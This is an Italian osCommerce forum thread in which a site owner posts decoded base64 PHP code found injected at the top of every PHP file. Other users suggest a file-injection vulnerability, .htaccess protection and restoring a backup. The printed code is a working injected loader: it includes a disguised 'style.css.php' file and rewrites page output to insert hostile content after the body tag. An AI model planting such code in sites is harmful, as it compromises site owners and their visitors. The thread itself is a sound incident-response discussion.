osCommerceITalia

comunità di utenti e sviluppatori italiani per osCommerce
http://oscommerceitalia.com/forums/

Probabile hacking

http://oscommerceitalia.com/forums/viewtopic.php?t=11868

Pagina 1 di 1

Probabile hacking

Inviato: 17/09/2009, 10:35
da folken
Salve,
dopo un pò che non accedevo a una installazione di oscommerceitalia pack 1.0.7 beta, ho notato del codice strano... in base64 in testa a tutti i file .php, codice decodificato:

Codice: Seleziona tutto

if(function_exists(\'ob_start\')&&!isset($GLOBALS[\'sh_no\'])){$GLOBALS[\'sh_no\']=1;if(file_exists(\'/home/miosito/public_html/admin/fckeditor/editor/filemanager/browser/default/images/icons/32/style.css.php\')){include_once(\'/home/miosito/public_html/admin/fckeditor/editor/filemanager/browser/default/images/icons/32/style.css.php\');if(function_exists(\'gml\')&&!function_exists(\'dgobh\')){if(!function_exists(\'gzdecode\')){function gzdecode($R20FD65E9C7406034FADC682F06732868){$R6B6E98CDE8B33087A33E4D3A497BD86B=ord(substr($R20FD65E9C7406034FADC682F06732868,3,1));$R60169CD1C47B7A7A85AB44F884635E41=10;$R0D54236DA20594EC13FC81B209733931=0;if($R6B6E98CDE8B33087A33E4D3A497BD86B&4){$R0D54236DA20594EC13FC81B209733931=unpack(\'v\',substr($R20FD65E9C7406034FADC682F06732868,10,2));$R0D54236DA20594EC13FC81B209733931=$R0D54236DA20594EC13FC81B209733931[1];$R60169CD1C47B7A7A85AB44F884635E41+=2+$R0D54236DA20594EC13FC81B209733931;}if($R6B6E98CDE8B33087A33E4D3A497BD86B&8){$R60169CD1C47B7A7A85AB44F884635E41=strpos($R20FD65E9C7406034FADC682F06732868,chr(0),$R60169CD1C47B7A7A85AB44F884635E41)+1;}if($R6B6E98CDE8B33087A33E4D3A497BD86B&16){$R60169CD1C47B7A7A85AB44F884635E41=strpos($R20FD65E9C7406034FADC682F06732868,chr(0),$R60169CD1C47B7A7A85AB44F884635E41)+1;}if($R6B6E98CDE8B33087A33E4D3A497BD86B&2){$R60169CD1C47B7A7A85AB44F884635E41+=2;}$RC4A5B5E310ED4C323E04D72AFAE39F53=gzinflate(substr($R20FD65E9C7406034FADC682F06732868,$R60169CD1C47B7A7A85AB44F884635E41));if($RC4A5B5E310ED4C323E04D72AFAE39F53===FALSE){$RC4A5B5E310ED4C323E04D72AFAE39F53=$R20FD65E9C7406034FADC682F06732868;}return $RC4A5B5E310ED4C323E04D72AFAE39F53;}}function dgobh($RDA3E61414E50AEE968132F03D265E0CF){Header(\'Content-Encoding: none\');$R3E33E017CD76B9B7E6C7364FB91E2E90=gzdecode($RDA3E61414E50AEE968132F03D265E0CF);if(preg_match(\'/\\<body/si\',$R3E33E017CD76B9B7E6C7364FB91E2E90)){return preg_replace(\'/(\\<body[^\\>]*\\>)/si\',\'$1\'.gml(),$R3E33E017CD76B9B7E6C7364FB91E2E90);}else{return gml().$R3E33E017CD76B9B7E6C7364FB91E2E90;}}ob_start(\'dgobh\');}}}
mi chiedo adesso cosa faccia di preciso quel codice, e come fare per poter evitare questo in futuro.

Credo che il problema sia dovuto a una versione fckeditor bacata.

Re: Probabile hacking

Inviato: 18/09/2009, 4:35
da marcus
Non credo si tratti di un problema dell'fckeditor come il codice sembrerebbe far pensare.

Penso piuttosto sia codice maligno inserito sfruttando una qualche vulnerabilità venuta fuori molto recentemente di tipo Remote File Code Injection di osc.

Una domanda: il pannello è protetto con .htaccess?

Saluti
Marcus

Re: Probabile hacking

Inviato: 19/09/2009, 9:56
da folken
Grazie marcus della risposta,

no il pannello non è protetto per il momento da .htaccess.
Per il momento ho eliminato il file "style.css.php" e ripristinato un precedente backup.

Credi sia una buona idea impostare un htpsswd? il sito è ad accesso pubblico.

Re: Probabile hacking

Inviato: 20/09/2009, 16:45
da hsg26
stesso problema di cui si parla qui...

viewtopic.php?f=1&t=11837

NB:

provate ad installare queste contribution:

http://forums.oscommerce.com/index.php?showtopic=313323
Tutti gli orari sono UTC+02:00
Pagina 1 di 1

Creato da phpBB® Forum Software © phpBB Limited

Traduzione Italiana phpBB-Italia.it